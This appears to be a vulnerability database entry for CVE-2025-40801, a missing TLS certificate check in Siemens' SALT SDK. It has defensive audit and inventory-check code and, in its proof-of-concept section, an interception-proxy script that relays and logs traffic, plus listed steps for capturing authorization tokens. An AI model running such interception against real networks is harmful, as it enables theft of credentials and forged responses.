Security Vulnerability Report
CVE-2025-40801 CVSS 8.1 HIGH

Published: 2025-12-09 16:17:45
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in COMOS V10.6 (All versions < V10.6.1), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions < V2506.0001), Simcenter System Architect (All versions < V2506.0001), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack.

Because the SDK never verifies the certificate the authorization server presents (CWE-295), TLS still encrypts the traffic but no longer proves who is on the other end. Any party that can place itself on the network path between the client and the authorization server can terminate the TLS connection with a certificate of its own, read the authorization exchange (including any tokens it carries) and return forged responses, without the client noticing. The on-path requirement is what the CVSS 3.1 vector's Attack Complexity: High reflects.
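The defect described above is a client-side TLS configuration problem, so the clearest way to see it is to put the weak client configuration next to a hardened one and run a check over both. The block below is an added example written for this page, not code from the advisory or from the SALT SDK (whose language and API are not published here). It shows the pattern CWE-295 describes in Python's ssl module, the configuration an SDK talking to a fixed authorization server should use, an audit function that flags the weak settings, and an offline probe that shows the hardened context refuses to start TLS when it has no server name to verify against. The CA bundle path is an assumed operator-supplied input.

```python
import socket
import ssl
from typing import List, Optional

# Added example for this page; not the SALT SDK's code. The ca_bundle argument is an
# assumed operator-supplied file containing the CA that issues the authorization
# server's certificate.


def vulnerable_context() -> ssl.SSLContext:
    """The client configuration behind CVE-2025-40801: TLS is negotiated, but the
    server's certificate chain and name are never checked, so an on-path
    attacker's certificate is accepted exactly like the real one."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be cleared before CERT_NONE is allowed
    ctx.verify_mode = ssl.CERT_NONE  # accept any certificate, or none at all
    return ctx


def hardened_context(ca_bundle: Optional[str] = None) -> ssl.SSLContext:
    """What the client should do: require a chain to a trusted CA, match the
    certificate against the server name, and refuse pre-1.2 TLS."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if ca_bundle is not None:
        # Trust only the CA behind the authorization server instead of every root
        # in the system store; the cheapest form of pinning for a fixed endpoint.
        ctx.load_verify_locations(cafile=ca_bundle)
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Return the CWE-295 findings for a client context; an empty list means OK."""
    findings = []
    if ctx.verify_mode == ssl.CERT_NONE:
        findings.append("verify_mode=CERT_NONE: server certificate chain is never validated")
    if not ctx.check_hostname:
        findings.append("check_hostname=False: certificate is not matched against the server name")
    return findings


def refuses_unverifiable_connection(ctx: ssl.SSLContext) -> bool:
    """True if ctx refuses to begin TLS when no server name is available to verify.

    Uses a local socketpair so nothing touches the network; the handshake itself is
    not started. A hardened context raises ValueError before any bytes are sent,
    the vulnerable one happily wraps the socket."""
    a, b = socket.socketpair()
    try:
        ssock = ctx.wrap_socket(a, server_hostname=None, do_handshake_on_connect=False)
        ssock.close()
        return False
    except ValueError:
        return True
    finally:
        a.close()
        b.close()


if __name__ == "__main__":
    for name, ctx in (("vulnerable", vulnerable_context()), ("hardened", hardened_context())):
        print(f"{name}: findings={audit_context(ctx)} "
              f"refuses_unverifiable={refuses_unverifiable_connection(ctx)}")
```

The audit is the check to run against any client you ship: both findings must be empty before the transport can be trusted to carry an authorization exchange. Note that `check_hostname` has to be cleared before `verify_mode` can be set to `CERT_NONE`, which is why code that disables validation almost always disables both.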

CVSS Details

CVSS 3.1 Score
8.1
Severity
HIGH
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score
9.2 CRITICAL
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-295 (Improper Certificate Validation)

Both vectors encode the on-path requirement: CVSS 3.1 as Attack Complexity High, CVSS 4.0 as Attack Requirements Present. Once the attacker is in the path, no privileges or user interaction are needed, and confidentiality, integrity and availability of the vulnerable system are all rated High.

Configurations (Affected Products)

No configuration (CPE) data is available in the NVD record; the affected products from the advisory are:

COMOS V10.6 (all versions < V10.6.1)
JT Bi-Directional Translator for STEP (all versions)
NX V2412 (all versions < V2412.8900 with Cloud Entitlement)
NX V2506 (all versions < V2506.6000 with Cloud Entitlement)
Simcenter 3D (all versions < V2506.6000 with Cloud Entitlement)
Simcenter Femap (all versions < V2506.0002 with Cloud Entitlement)
Simcenter Studio (all versions < V2506.0001)
Simcenter System Architect (all versions < V2506.0001)
Tecnomatix Plant Simulation (all versions < V2504.0007)
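The list above is what an asset owner has to compare their inventory against, and the ranges are not uniform: one product has no fix at all, four are only in scope when the cloud-entitled licensing path is in use, and the build numbers carry leading zeros. The following is an added inventory check written for this page, not a tool from the advisory; the fixed versions are copied from the description, the product names are the advisory's, and the sample inventory is constructed.

```python
from typing import Dict, List, Optional, Tuple

# Added example for this page. First fixed version per product, copied from the
# advisory description; None means every version is affected and no fix is listed.
FIRST_FIXED: Dict[str, Optional[str]] = {
    "COMOS V10.6": "V10.6.1",
    "JT Bi-Directional Translator for STEP": None,
    "NX V2412": "V2412.8900",
    "NX V2506": "V2506.6000",
    "Simcenter 3D": "V2506.6000",
    "Simcenter Femap": "V2506.0002",
    "Simcenter Studio": "V2506.0001",
    "Simcenter System Architect": "V2506.0001",
    "Tecnomatix Plant Simulation": "V2504.0007",
}

# Products the advisory qualifies with "with Cloud Entitlement": an installation
# that does not use the cloud-entitled (NX X / Simcenter X) licensing is out of scope.
CLOUD_ENTITLEMENT_ONLY = {"NX V2412", "NX V2506", "Simcenter 3D", "Simcenter Femap"}


def parse_version(version: str) -> Tuple[int, ...]:
    """'V2506.0002' -> (2506, 2). Leading 'V' is optional; zero padding is ignored
    so that '0002' and '2' compare equal, and tuples compare component-wise."""
    return tuple(int(part) for part in version.strip().lstrip("Vv").split("."))


def is_affected(product: str, installed: str, cloud_entitlement: bool = True) -> bool:
    """Decide whether one installed build falls inside the advisory's affected range."""
    if product not in FIRST_FIXED:
        raise KeyError(f"{product!r} is not listed for CVE-2025-40801")
    if product in CLOUD_ENTITLEMENT_ONLY and not cloud_entitlement:
        return False
    fixed = FIRST_FIXED[product]
    if fixed is None:
        return True  # "All versions": nothing to upgrade to yet
    return parse_version(installed) < parse_version(fixed)


def affected_inventory(inventory: List[Tuple[str, str, bool]]) -> List[Tuple[str, str]]:
    """inventory rows are (product, installed_version, cloud_entitlement)."""
    return [(p, v) for p, v, ce in inventory if is_affected(p, v, ce)]


# Constructed sample inventory; not real hosts.
SAMPLE_INVENTORY = [
    ("NX V2412", "V2412.8500", True),                          # below fix: affected
    ("NX V2412", "V2412.8500", False),                         # no cloud entitlement: out of scope
    ("COMOS V10.6", "V10.6.1", True),                          # at fix: not affected
    ("Simcenter Femap", "2506.0001", True),                    # 0001 < 0002: affected
    ("JT Bi-Directional Translator for STEP", "V1.0", True),   # no fix listed: affected
]

if __name__ == "__main__":
    for product, version in affected_inventory(SAMPLE_INVENTORY):
        print(f"AFFECTED: {product} {version}")
```

The comparison is done on integer tuples rather than strings so that "V2412.8900" sorts after "V2412.8500" and a bare "V10.6" is treated as older than "V10.6.1"; string comparison would get the zero-padded Simcenter builds right by accident and the NX builds wrong as soon as a component changes width.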

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-40801 PoC - TLS Certificate Validation Bypass
# This PoC demonstrates the MITM attack vector against SALT SDK
# Note: This is for educational and authorized testing purposes only
#
# start_proxy() uses the legacy mitmproxy API (mitmproxy.proxy.ProxyConfig and
# mitmproxy.proxy.server.ProxyServer), which exists in mitmproxy 4.x to 6.x only.
# It is imported lazily so demonstrate_vulnerability() runs with the standard
# library alone.
import socket
import ssl


class TLSInterceptor:
    """
    TLS/SSL Certificate Validation Bypass PoC
    Simulates an attacker performing a MITM attack made possible by missing
    server certificate validation in the client.
    """

    def __init__(self, listen_port=8443, target_host='auth.siemens.com', target_port=443):
        # target_host is a placeholder for the SALT authorization server;
        # the advisory does not name the real endpoint.
        self.listen_port = listen_port
        self.target_host = target_host
        self.target_port = target_port
        self.captured_data = []

    def create_fake_tls_context(self):
        """
        Create a TLS client context without certificate validation.
        This reproduces the vulnerable SDK behaviour (CWE-295): the handshake
        completes against any certificate, including an attacker's.
        """
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE  # Critical: No certificate validation
        return ctx

    def start_proxy(self):
        """
        Start a MITM proxy to intercept TLS connections (legacy mitmproxy API).
        """
        from mitmproxy import options, proxy
        from mitmproxy.proxy.server import ProxyServer

        opts = options.Options(listen_host='0.0.0.0', listen_port=self.listen_port)
        opts.ssl_insecure = True  # Accept any upstream certificate
        config = proxy.ProxyConfig(opts)
        server = ProxyServer(config)
        print(f"[*] MITM Proxy started on port {self.listen_port}")
        print(f"[*] Redirecting traffic to {self.target_host}:{self.target_port}")
        return server

    def capture_credentials(self, client_socket, server_socket):
        """
        Relay one intercepted connection and log everything that passes through.
        Both sockets must already be TLS-wrapped: the client side with the
        attacker's certificate, the server side as an ordinary TLS client.
        """
        try:
            while True:
                # Receive data from client
                client_data = client_socket.recv(4096)
                if not client_data:
                    break
                # Log captured data (in a real attack this would be exfiltrated)
                self.captured_data.append(client_data)
                print(f"[+] Captured {len(client_data)} bytes from client")
                # Forward to server
                server_socket.sendall(client_data)

                # Receive response from server and relay it back
                server_response = server_socket.recv(4096)
                if server_response:
                    self.captured_data.append(server_response)
                    client_socket.sendall(server_response)
        except Exception as e:
            print(f"[-] Error during interception: {e}")
        finally:
            client_socket.close()
            server_socket.close()

    def demonstrate_vulnerability(self):
        """
        Demonstrate the certificate validation bypass from the client side.
        """
        print("=" * 60)
        print("CVE-2025-40801 - SALT SDK Certificate Validation Bypass")
        print("=" * 60)

        print("\n[*] Establishing connection WITHOUT certificate validation...")
        ctx = self.create_fake_tls_context()
        try:
            with socket.create_connection((self.target_host, self.target_port), timeout=10) as sock:
                with ctx.wrap_socket(sock, server_hostname=self.target_host) as ssock:
                    # With CERT_NONE the handshake succeeds whatever certificate the
                    # peer presents, and getpeercert() returns {} because nothing
                    # was verified.
                    cert = ssock.getpeercert()
                    print("[!] WARNING: Handshake completed with certificate verification disabled")
                    print(f"[!] getpeercert() -> {cert!r} (empty: no validation performed)")
                    print(f"[!] Negotiated {ssock.version()} with {ssock.cipher()}")
                    print("[*] An on-path attacker's certificate would have been accepted the same way")
                    return True
        except Exception as e:
            print(f"[-] Connection failed: {e}")
            return False


def main():
    poc = TLSInterceptor()
    poc.demonstrate_vulnerability()
    print("\n[*] To fully exploit this vulnerability:")
    print("    1. Position attacker in network path (MITM)")
    print("    2. Deploy malicious TLS server with self-signed cert")
    print("    3. Redirect SALT SDK traffic to attacker-controlled server")
    print("    4. Capture authorization tokens and credentials")
    print("    5. Potentially inject malicious responses")


if __name__ == '__main__':
    main()
```

References

https://cert-portal.siemens.com/productcert/html/ssa-212953.html (Siemens ProductCERT, SSA-212953)
https://cert-portal.siemens.com/productcert/html/ssa-710408.html (Siemens ProductCERT, SSA-710408)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-40801", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:45.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in COMOS V10.6 (All versions < V10.6.1), COMOS V10.6 (All versions < V10.6.1), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions < V2506.0001), Simcenter System Architect (All versions < V2506.0001), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-212953.html", "source": "[email protected]"}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-710408.html", "source": "[email protected]"}]}}
```